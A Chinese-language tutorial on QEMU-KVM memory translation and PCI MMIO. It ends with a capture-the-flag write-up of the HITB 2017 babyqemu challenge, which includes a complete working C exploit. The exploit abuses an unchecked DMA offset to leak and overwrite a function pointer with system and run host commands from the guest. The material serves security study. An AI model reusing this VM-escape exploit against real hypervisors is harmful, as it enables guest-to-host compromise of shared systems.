Qemu-kvm原理
Qemu
是一个通用的开源机器模拟器和虚拟化器(virtualizer):
- 模拟各种架构的硬件,使用二进制翻译技术
- 创建虚拟机,通过 ioctl 与内核 KVM 模块进行交互
Qemu
为每个虚拟机创建一个进程,进程中,为每个虚拟CPU
创建一个线程,Guest
系统和应用都运行在虚拟CPU
中
Qemu
可以模拟I/O
处理,执行流程:虚拟机中进行I/O
操作 → 进入KVM → KVM进行判断处理并将控制权交给Qemu
,由Qemu来模拟I/O
设备去响应虚拟机中的I/O
请求
KVM
是Linux
系统的内核模块,实现CPU
的虚拟化、内存的虚拟化
内存布局
- GVA : guest virtual address 虚拟机中的虚拟地址
- GPA : guest physical address 虚拟机中的物理地址
- HVA : host virtual address 宿主机中的虚拟地址
- HPA : host physical address 宿主机中的物理地址
示意图如下所示:
Guest's processes
+--------------------+
Virtual addr space | |
+--------------------+ (GVA)
| |
\__ Page Table \__
\ \
| | Guest kernel
+----+--------------------+----------------+
Guest's phy memory | | | | (GPA)
+----+--------------------+----------------+
| |
\__ \__
\ \
| QEMU process |
+----+------------------------------------------+
Virtual addr space | | | (HVA)
+----+------------------------------------------+
| |
\__ Page Table \__
\ \
| |
+----+-----------------------------------------------+----+
Physical memory | | | | (HPA)
+----+-----------------------------------------------+----+
地址转换:GVA → GPA → HVA → HPA
GPA是宿主机进程mmap出来的内存
测试代码:
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) //4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
int fd;
/*
 * Return the position of addr inside its page, i.e. the low PAGE_SHIFT bits
 * of the address.
 */
uint64_t page_offset(uint64_t addr)
{
    const uint64_t in_page_mask = (1 << PAGE_SHIFT) - 1;

    return addr & in_page_mask;
}
/*
 * Translate a virtual address of this process into a page frame number by
 * reading its entry from the pagemap file that is open on the global `fd`.
 *
 * pagemap stores one 64-bit entry per virtual page, so the entry for `addr`
 * sits at byte offset (addr >> PAGE_SHIFT) * 8, which is (addr >> 9) with the
 * low three bits cleared.
 *
 * Returns the frame number (the PFN_PFN bits of the entry), or (uint64_t)-1
 * when the entry cannot be read or the page is not marked present.
 */
uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme = 0;
    off_t offset = (off_t)(((uintptr_t)addr >> 9) & ~(uintptr_t)7);

    /* A failed seek or a short read would leave pme meaningless. */
    if (lseek(fd, offset, SEEK_SET) == (off_t)-1)
        return (uint64_t)-1;
    if (read(fd, &pme, sizeof pme) != (ssize_t)sizeof pme)
        return (uint64_t)-1;

    if (!(pme & PFN_PRESENT))
        return (uint64_t)-1;

    return pme & PFN_PFN;
}
/*
 * Convert a guest virtual address into a guest physical address: the page
 * frame number shifted up by PAGE_SHIFT, OR-ed with the in-page offset.
 * Aborts through assert() when gva_to_gfn() reports failure.
 */
uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn;
    uint64_t in_page;

    /* addr is a GVA; look up the page frame number that backs it. */
    gfn = gva_to_gfn(addr);
    assert(gfn != -1);

    in_page = page_offset((uint64_t)addr);
    return (gfn << PAGE_SHIFT) | in_page;
}
/*
 * Demo: place a marker string on the heap, translate its address through
 * /proc/self/pagemap, print the resulting physical address, then block on
 * getchar() so the process stays alive while it is inspected from outside.
 */
int main(void)
{
    char *ptr;
    uint64_t ptr_mem;

    /* pagemap exposes this process's virtual-to-physical mappings. */
    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }

    ptr = malloc(256);
    if (ptr == NULL) {
        perror("malloc");
        close(fd);
        exit(1);
    }
    strcpy(ptr, "Where am I?");
    printf("%s\n", ptr);

    /* Run inside the guest, this is the guest physical address of the string. */
    ptr_mem = gva_to_gpa(ptr);
    printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem);

    getchar();

    free(ptr);
    close(fd);
    return 0;
}
编译命令:
gcc mmu.c -static -o mmu
Qemu来启动一个虚拟机,把编译好的程序放进去运行
再通过
gdb attach
到qemu
的进程上,用 search
查找该字符串,得到它在 qemu 进程中的地址(HVA),再减去程序打印出的物理地址(GPA),即可算出虚拟机物理内存的起始地址:
>>> hex(0x7fb153819880-0x3a19880)
'0x7fb14fe00000'
>>>
在
gdb
中使用vmmap
命令查看qemu
的地址空间。
综上所述,0x7fb14fe00000 就是虚拟机物理地址为 0 的位置。
DMA
DMA本身不属于某一类外设,它是一种外设与内存传输数据的方式。
PCI设备地址空间
PCI可以申请两类地址空间,分别是
memory space
和 I/O space
通过
memory space
访问设备I/O
的方式称为memory mapped I/O
即MMIO
,在MMIO
中,内存和I/O
设备共享同一个地址空间。
Qemu中访问I/O空间
用户态访问:通过映射 resource0 文件实现对设备内存的访问
#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include<sys/io.h>
unsigned char* mmio_mem;
/*
 * Print msg followed by the description of the current errno value via
 * perror(), then terminate the process by calling exit(-1).
 */
void die(const char *msg)
{
    perror(msg);

    exit(-1);
}
/*
 * Store a 32-bit value at byte offset addr inside the region mapped at
 * mmio_mem. The store goes through a volatile pointer so the compiler has to
 * emit exactly this access and may not drop, merge or reorder it against
 * other volatile accesses.
 */
void mmio_write(uint32_t addr, uint32_t value)
{
    volatile uint32_t *reg = (volatile uint32_t *)(mmio_mem + addr);

    *reg = value;
}
/*
 * Load a 32-bit value from byte offset addr inside the region mapped at
 * mmio_mem. The load goes through a volatile pointer so it is performed even
 * when the caller discards the result.
 */
uint32_t mmio_read(uint32_t addr)
{
    volatile uint32_t *reg = (volatile uint32_t *)(mmio_mem + addr);

    return *reg;
}
/*
 * Map the first 0x1000 bytes of the PCI device's resource0 file and perform
 * one 32-bit read and one 32-bit write at offset 0x128 through the mapping.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    // Open and map I/O memory for the strng device
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");

    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED)
        die("mmap mmio_mem failed");

    /* The mapping stays valid after the descriptor is closed. */
    close(mmio_fd);

    /* %p requires a void * argument. */
    printf("mmio_mem @ %p\n", (void *)mmio_mem);

    mmio_read(0x128);
    mmio_write(0x128, 1337);

    munmap(mmio_mem, 0x1000);
    return 0;
}
HITB GSEC 2017 babyqemu 逃逸
题目附件信息:
❯ ls -al
总用量 51524
drwxr-xr-x 4 root root 4096 Oct 21 11:54 .
drwx------ 88 root root 4096 Oct 21 12:08 ..
drwxr-xr-x 17 root root 4096 Oct 20 14:54 file #rootfs.cpio 解压出来的文件系统
-rwxr-xr-x 1 root root 291 Oct 21 11:52 launch.sh#启动VM命令
drwxr-xr-x 6 root root 4096 Jul 11 2017 pc-bios
-rwxr-xr-x 1 root root 39682064 Jul 11 2017 qemu-system-x86_64
-rw-r--r-- 1 root root 5734400 Oct 21 11:49 rootfs.cpio#文件系统
-rwxr-xr-x 1 root root 7308672 Jul 11 2017 vmlinuz-4.8.0-52-generic#linux内核文件
启动命令:
❯ cat launch.sh
#! /bin/sh
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-enable-kvm \
-monitor /dev/null \
-m 64M --nographic -L ./dependency/usr/local/share/qemu \
-L pc-bios \
-device hitb,id=vda
关键点是
-device hitb
,表明了该VM系统中存在一个hitb
驱动设备。
把
qemu-system-x86_64
载入IDA中,发现是存在符号的,通过函数名中的关键字筛选出一些关键函数如下所示:
首先看函数
pci_hitb_register_types
,该函数是进行PCI设备注册void __cdecl pci_hitb_register_types()
{
/* IDA decompiler output: passes the static descriptor hitb_info_27046 to type_register_static(). */
type_register_static(&hitb_info_27046);
}
通过查看
hitb_info_27046
,得到class_init和instance_init对应的实例。
在local_type中通过搜索关键字找到相关的结构体
在
hitb_class_init
函数中,设置了PCI配置的一些信息void __fastcall hitb_class_init(ObjectClass_0 *a1, void *data)
{
/* IDA decompiler output: casts a1 to a PCIDeviceClass and fills in its fields. */
PCIDeviceClass *v2; // rax
/* NOTE(review): the two &stru_... arguments look like IDA mis-symbolised pointers; 469 and the function name are passed along with them. */
v2 = object_class_dynamic_cast_assert(
a1,
&stru_64A230.bulk_in_pending[2].data[72],
&stru_5AB2C8.msi_vectors,
469,
"hitb_class_init");
v2->revision = 16;
/* 255 == 0x00ff, matching "Class 00ff" of the 00:04.0 entry in the lspci output. */
v2->class_id = 255;
/* Callbacks stored for the realize and exit slots of the class. */
v2->realize = pci_hitb_realize;
v2->exit = pci_hitb_uninit;
/* 1234:2333 is the vendor:device pair lspci prints for 00:04.0. */
v2->vendor_id = 0x1234;
v2->device_id = 0x2333;
}
运行VM,使用
lspci
命令查看pci
设备,可以看到最后一个就是hitb
Welcome to HITB
HITB login: root
# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
#
hitb_instance_init函数中初始化了
HitbState->enc
的初始值void __fastcall hitb_instance_init(Object_0 *obj)
{
/* IDA decompiler output: casts obj to HitbState, sets dma_mask, stores hitb_enc and adds an object property. */
HitbState *v1; // rax
/* NOTE(review): the &stru_... arguments look like IDA mis-symbolised pointers; 459 and the function name are passed along with them. */
v1 = object_dynamic_cast_assert(
obj,
&stru_5AB2C8.not_legacy_32bit + 12,
&stru_5AB2C8.msi_vectors,
459,
"hitb_instance_init");
/* 0xFFFFFFF has the low 28 bits set. */
v1->dma_mask = 0xFFFFFFFLL;
/* v1 is advanced by 7104 and then indexed backwards; the store below lands on the enc field. */
v1 = (v1 + 7104);
*(&v1[-1].dma_mask + 1) = hitb_enc; // stores the address of hitb_enc into the enc field of HitbState
/* hitb_obj_uint64 is passed twice (presumably getter and setter — confirm against the QEMU API), with the advanced v1 as an argument. */
object_property_add(
obj,
&stru_5AB2C8.server_bar2.coalesced.tqh_first + 3,
"uint64",
hitb_obj_uint64,
hitb_obj_uint64,
0LL,
v1,
0LL);
}
pci_hitb_realize
函数中,首先是添加了一个qemu-timer
,也就是说,会定时执行指定函数。此处该函数是hitb_dma_timer
,接着注册了hitb_mmio_ops
结构体,指明了读写时具体是哪个函数操作的。分别是hitb_mmio_read
和hitb_mmio_write
hitb_mmio_read
函数中,第二个参数决定函数返回哪块区域内存。uint64_t __fastcall hitb_mmio_read(HitbState *opaque, hwaddr addr, unsigned int size)
{
/*
 * MMIO read handler (IDA decompiler output). Returns the device field
 * selected by the register offset `addr`. Only accesses with size == 4 are
 * decoded; any other size, or an offset not listed below, yields -1.
 */
uint64_t result; // rax
uint64_t val; // [rsp+0h] [rbp-20h]
result = -1LL;
if ( size == 4 )
{
/* 0x80: dma.src */
if ( addr == 128 )
return opaque->dma.src;
if ( addr > 0x80 )
{
/* 0x8c: value read starting 4 bytes into dma.dst */
if ( addr == 140 )
return *(dma_addr_t *)((char *)&opaque->dma.dst + 4);
if ( addr <= 0x8C )
{
/* 0x84: value read starting 4 bytes into dma.src */
if ( addr == 132 )
return *(dma_addr_t *)((char *)&opaque->dma.src + 4);
/* 0x88: dma.dst */
if ( addr == 136 )
return opaque->dma.dst;
}
else
{
/* 0x90: dma.cnt */
if ( addr == 144 )
return opaque->dma.cnt;
/* 0x98: dma.cmd */
if ( addr == 152 )
return opaque->dma.cmd;
}
}
else
{
/* 0x08: fact, copied out while holding thr_mutex */
if ( addr == 8 )
{
qemu_mutex_lock(&opaque->thr_mutex);
val = opaque->fact;
qemu_mutex_unlock(&opaque->thr_mutex);
return val;
}
if ( addr <= 8 )
{
/* 0x00: fixed constant 16777453 (0x010000ED) */
result = 16777453LL;
if ( !addr )
return result;
/* 0x04: addr4 */
if ( addr == 4 )
return opaque->addr4;
}
else
{
/* 0x20: status */
if ( addr == 32 )
return opaque->status;
/* 0x24: irq_status */
if ( addr == 36 )
return opaque->irq_status;
}
}
/* No register matched: fall back to -1. */
result = -1LL;
}
return result;
}
hitb_mmio_write
函数中,第二个参数决定要改的区域,第三个参数决定值。
- addr=0x80 , opaque->dma.src = val
- addr=0x84 , *(dma_addr_t *)((char *)&opaque->dma.src + 4) = val
- addr=0x88 , opaque->dma.dst = val
- addr=0x8c , *(dma_addr_t *)((char *)&opaque->dma.dst + 4) = val;
- addr=0x90 , opaque->dma.cnt = val;
- addr=0x98 , opaque->dma.cmd = val;并调用timer_mod激活定时器
hitb_dma_timer
函数中根据 opaque->dma.cmd
的值来决定做什么操作
- opaque->dma.cmd=1|2|4时,先设置
v2 = (unsigned int)(LODWORD(opaque->dma.src) - 0x40000);
,接着执行opaque->enc(&opaque->dma_buf[v2], opaque->dma.cnt);
调用cpu_physical_memory_rw
函数将&opaque->dma_buf[v2]
拷贝到opaque->dma.dst
拷贝长度为opaque->dma.cnt
- opaque->dma.cmd=1|2时,不加密,直接拷贝
- opaque->dma.cmd=1|0时,从src中长度为cnt的内容拷贝到dma_buf中
漏洞所在
dma.src是我们可以控制的,利用
dma.cmd=1|2|4
可以任意地址读,利用dma.cmd=1|0
可以实现任意地址写。
enc函数指针在buf之后,并且可以控制程序执行到enc函数,攻击思路就是把enc函数指针覆盖成system,参数
&opaque->dma_buf[v2];
改成想要执行的命令即可。
exp:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <ctype.h>
#include <termios.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/io.h>
#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)
#define DMA_BASE 0x40000
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
char* pci_device_name = "/sys/devices/pci0000:00/0000:00:04.0/resource0";
unsigned char* tmpbuf;
uint64_t tmpbuf_phys_addr;
unsigned char* mmio_base;
/*
 * Map MAP_SIZE bytes of the PCI resource file named by pci_device_name,
 * store the mapping in the global mmio_base and return it.
 * Prints an error and exits with -1 when open() or mmap() fails.
 */
unsigned char* getMMIOBase(void)
{
    int fd = open(pci_device_name, O_RDWR | O_SYNC);

    if (fd == -1) {
        perror("open pci device");
        exit(-1);
    }

    mmio_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (mmio_base == MAP_FAILED) {
        perror("mmap");
        close(fd);
        exit(-1);
    }

    /* The mapping stays valid after the descriptor is closed, so do not leak it. */
    close(fd);
    return mmio_base;
}
/*
 * Return the offset of addr inside its page: the low PAGE_SHIFT bits,
 * i.e. addr & 0xfff with PAGE_SHIFT == 12.
 */
uint32_t page_offset(uint32_t addr)
{
    const uint32_t in_page_mask = (1 << PAGE_SHIFT) - 1;

    return addr & in_page_mask;
}
/*
 * Look up the page frame number that backs virtual address `addr` of this
 * process by reading its entry from /proc/self/pagemap.
 *
 * Each pagemap entry is 64 bits wide, so the entry for a page lives at
 * (addr / page_size) * sizeof(uint64_t). With 4 KiB pages that is
 * (addr >> 12) << 3, which equals (addr >> 9) with the low three bits
 * cleared; the "& ~7" below does that clearing.
 *
 * Exits with status 1 when pagemap cannot be opened. Returns the frame number
 * (the PFN_PFN bits of the entry), or (uint64_t)-1 when the entry cannot be
 * read or the page is not marked present.
 */
uint64_t gva_to_gfn(void *addr)
{
    uint64_t pme = 0;
    uint64_t gfn = (uint64_t)-1;
    off_t offset;
    int fd;

    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }

    offset = (off_t)(((uintptr_t)addr >> 9) & ~(uintptr_t)7);

    /* Only trust pme after a successful seek and a full 8-byte read. */
    if (lseek(fd, offset, SEEK_SET) != (off_t)-1 &&
        read(fd, &pme, sizeof pme) == (ssize_t)sizeof pme &&
        (pme & PFN_PRESENT)) {
        gfn = pme & PFN_PFN;
    }

    /* This function is called per translation; close the file every time. */
    close(fd);
    return gfn;
}
/*
 * Convert a guest virtual address into a guest physical address by combining
 * the page frame number from gva_to_gfn() with the in-page offset.
 * Aborts through assert() when the frame lookup fails.
 */
uint64_t gva_to_gpa(void *addr)
{
    uint64_t gfn;
    uint64_t in_page;

    gfn = gva_to_gfn(addr);
    assert(gfn != -1);

    in_page = page_offset((uint64_t)addr);
    return (gfn << PAGE_SHIFT) | in_page;
}
/*
 * Store a 64-bit value at byte offset addr inside the region mapped at
 * mmio_base. The store goes through a volatile pointer so the compiler has to
 * emit this access and may not drop it or reorder it against other volatile
 * accesses.
 */
void mmio_write(uint64_t addr, uint64_t value)
{
    volatile uint64_t *reg = (volatile uint64_t *)(mmio_base + addr);

    *reg = value;
}
/*
 * Load a 64-bit value from byte offset addr inside the region mapped at
 * mmio_base. The load goes through a volatile pointer so it is performed even
 * when the caller ignores the result.
 */
uint64_t mmio_read(uint64_t addr)
{
    volatile uint64_t *reg = (volatile uint64_t *)(mmio_base + addr);

    return *reg;
}
/* Write val to MMIO offset 0x90 (144), the register that sets dma.cnt. */
void set_cnt(uint64_t val)
{
    const uint64_t cnt_reg = 0x90;

    mmio_write(cnt_reg, val);
}
/* Write val to MMIO offset 0x80 (128), the register that sets dma.src. */
void set_src(uint64_t val)
{
    const uint64_t src_reg = 0x80;

    mmio_write(src_reg, val);
}
/* Write val to MMIO offset 0x88 (136), the register that sets dma.dst. */
void set_dst(uint64_t val)
{
    const uint64_t dst_reg = 0x88;

    mmio_write(dst_reg, val);
}
/*
 * Write val to MMIO offset 0x98 (152), the register that sets dma.cmd;
 * the device arms its DMA timer when this register is written.
 */
void start_dma_timer(uint64_t val)
{
    const uint64_t cmd_reg = 0x98;

    mmio_write(cmd_reg, val);
}
/*
 * Ask the device to copy cnt bytes starting at dma_buf[offset] into the guest
 * physical page behind tmpbuf, without the enc step (cmd = 1|2).
 * Sleeps one second so the timer callback has run before returning.
 */
void dma_read(uint64_t offset, uint64_t cnt)
{
    const uint64_t cmd = 1|2;

    /* Source: index into dma_buf, expressed relative to DMA_BASE. */
    set_src(DMA_BASE + offset);
    /* Destination: physical address the device writes the data to. */
    set_dst(tmpbuf_phys_addr);
    /* Number of bytes to transfer. */
    set_cnt(cnt);

    /* Writing the command register triggers hitb_dma_timer. */
    start_dma_timer(cmd);

    /* Give the timer callback time to finish. */
    sleep(1);
}
/*
 * Copy cnt bytes from buf into dma_buf[offset] on the device: the data is
 * staged in tmpbuf, then a DMA transfer (cmd = 1) is started from tmpbuf's
 * physical address into the device buffer.
 * Sleeps one second so the timer callback has run before returning.
 */
void dma_write(uint64_t offset, char* buf, uint64_t cnt)
{
    const uint64_t cmd = 1;

    /* Stage the payload where the device can read it. */
    memcpy(tmpbuf, buf, cnt);

    /* Source: physical address of the staged payload. */
    set_src(tmpbuf_phys_addr);
    /* Destination: index into dma_buf, expressed relative to DMA_BASE. */
    set_dst(DMA_BASE + offset);
    /* Number of bytes to transfer. */
    set_cnt(cnt);

    /* Writing the command register triggers hitb_dma_timer. */
    start_dma_timer(cmd);

    /* Give the timer callback time to finish. */
    sleep(1);
}
/* Write the 8 bytes of val into dma_buf[offset] through dma_write(). */
void dma_write_qword(uint64_t offset, uint64_t val)
{
    char *raw = (char *)&val;

    dma_write(offset, raw, sizeof val);
}
/*
 * Same transfer as dma_read(), but with cmd = 1|2|4 so the device first calls
 * opaque->enc(&dma_buf[offset], cnt) before copying the data out.
 * Sleeps one second so the timer callback has run before returning.
 */
void dma_enc_read(uint64_t offset, uint64_t cnt)
{
    const uint64_t cmd = 1|2|4;

    /* Source: index into dma_buf, expressed relative to DMA_BASE. */
    set_src(DMA_BASE + offset);
    /* Destination: physical address the device writes the data to. */
    set_dst(tmpbuf_phys_addr);
    /* Number of bytes to transfer; also handed to enc as its second argument. */
    set_cnt(cnt);

    /* Writing the command register triggers hitb_dma_timer. */
    start_dma_timer(cmd);

    /* Give the timer callback time to finish. */
    sleep(1);
}
int main(int argc, char const *argv[])
{
getMMIOBase();
printf("mmio_base Resource0Base: %p\n", mmio_base);
tmpbuf = malloc(0x1000);
tmpbuf_phys_addr = gva_to_gpa(tmpbuf);
printf("gva_to_gpa tmpbuf_phys_addr %p\n", (void*)tmpbuf_phys_addr);
//just test
// dma_write(0, "giantbranch", 11);
// dma_read(0, 11);
// printf("tmpbuf: %s\n", tmpbuf);
// 将enc函数指针写到tmpbuf_phys_addr,之后通过tmpbuf读出即可
dma_read(4096, 8);
uint64_t hitb_enc_addr = *((uint64_t*)tmpbuf);
uint64_t binary_base_addr = hitb_enc_addr - 0x283DD0;
uint64_t system_addr = binary_base_addr + 0x1FDB18;
printf("hitb_enc_addr: 0x%lx\n", hitb_enc_addr);
printf("binary_base_addr: 0x%lx\n", binary_base_addr);
printf("system_addr: 0x%lx\n", system_addr);
// 覆盖enc函数指针为system地址
dma_write_qword(4096, system_addr);
// 将我们要执行的命令复制到tmpbuf中
// char* command = "gnome-calculator";
// char* command = "pwd";
char* command = "uname -a";
dma_write(0x200, command, strlen(command));
// 触发hitb_dma_timer中的enc函数,从而调用syetem
// 下面的666设置的是cnt,可以是任意值,没什么影响
dma_enc_read(0x200, 666);
return 0;
}
攻击效果: